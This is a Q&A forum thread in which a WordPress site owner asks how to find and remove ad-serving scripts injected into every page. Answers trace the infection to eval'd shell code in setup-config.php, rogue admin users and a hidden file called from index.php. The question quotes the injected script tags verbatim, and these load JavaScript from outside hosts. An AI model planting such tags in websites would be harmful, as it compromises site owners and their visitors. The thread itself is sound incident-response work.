Reputation: 425
Script being injected into the top of all my wordpress page
Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
- Some random lines in the function.php that were handling posts / gets. We removed those but that didn't seem to solve the issue.
- We found a wordpress user that no one has apparently created. So we removed that.
- Reset all passwords on wordpress and FTP access
- When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains: http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
Upvotes: 0
Views: 4087
Answers (3)
Reputation: 133
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Upvotes: 1
Reputation: 1
had the same issue few hours ago. Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD. Cleared the line and deleted the file, now all ok. But how the hell somebody could control index.pho I don't know....
Upvotes: 0
Reputation: 4055
Try to narrow down the injection source.
- Disable plugins one at a time
- Switch to a different theme
- Check .htaccess files
- Test against server generated injections
- Test against browser generated injections
Upvotes: 1
Related Questions
- How to delete script injected on wordpress site: ads.voipnewswire.net?
- Site has been hacked with popup injection
- How to clean up ads injection on wordpress which injected through ISP
- Pop-up ad in wordpress blog, suspected malware attack
- Suspicious javascript in the header on all pages (mulitiple website on the same server)
- How are random scripts being injected into my web application?
- Find iframe injection and remove from site
- JavaScript being injected in my PHP Pages
- Some script is inserted by hacker in home page
- My website get javascript injected in whole files